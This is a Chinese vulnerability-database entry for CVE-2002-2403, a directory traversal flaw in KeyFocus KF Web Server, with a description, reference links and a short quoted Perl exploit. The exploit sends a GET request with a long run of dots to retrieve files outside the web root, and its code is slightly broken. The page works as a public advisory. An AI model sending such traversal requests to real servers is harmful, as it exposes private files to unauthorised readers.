KeyFocus KF Web Server远程目录遍历漏洞

KeyFocus KF Web Server远程目录遍历漏洞

漏洞ID 1107095 漏洞类型 路径遍历
发布时间 2002-11-13 更新时间 2002-12-31
图片[1]-KeyFocus KF Web Server远程目录遍历漏洞-安全小百科CVE编号 CVE-2002-2403
图片[2]-KeyFocus KF Web Server远程目录遍历漏洞-安全小百科CNNVD-ID CNNVD-200212-755
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22018
https://cxsecurity.com/issue/WLB-2007110005
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-755
|漏洞详情
KeyFocusWeb服务程序是一款多功能的HTTP服务程序,支持多种日志格式,目录索引,预定义MIME设置,URL检查等功能。KeyFocusWeb服务程序不正确处理文件名包含’.’字符的请求,远程攻击者可以利用这个漏洞进行目录遍历攻击。攻击者提交多个’.’字符的WEB请求,可导致脱离WEBROOT目录,而以WEB进程的权限遍历系统目录,查看任意可查看的敏感文件内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/6180/info

KeyFocus KF Web Server is vulnerable to a directory traversal attack. This is due to the web server's inability to properly handle file names containing consecutive dot characters. By exploiting this vulnerability, an attacker is able to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved. 

#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0rnrn");
print $f $exploit;
undef $f;
}
|参考资料

来源:BID
名称:6180
链接:http://www.securityfocus.com/bid/6180
来源:BUGTRAQ
名称:20021113KeyFocusKFWebServerFileDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/299742
来源:www.keyfocus.net
链接:http://www.keyfocus.net/kfws/support/
来源:XF
名称:keyfocus-get-directory-traversal(10622)
链接:http://www.iss.net/security_center/static/10622.php
来源:SREASON
名称:3331
链接:http://securityreason.com/securityalert/3331
来源:VULNWATCH
名称:20021113KeyFocusKFWebServerFileDisclosureVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0073.html
来源:NSFOCUS
名称:3844
链接:http://www.nsfocus.net/vulndb/3844

相关推荐: AIX RAS trcfile Insecure Temporary File Creation Vulnerability

AIX RAS trcfile Insecure Temporary File Creation Vulnerability 漏洞ID 1104937 漏洞类型 Origin Validation Error 发布时间 1998-07-21 更新时间 1998…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享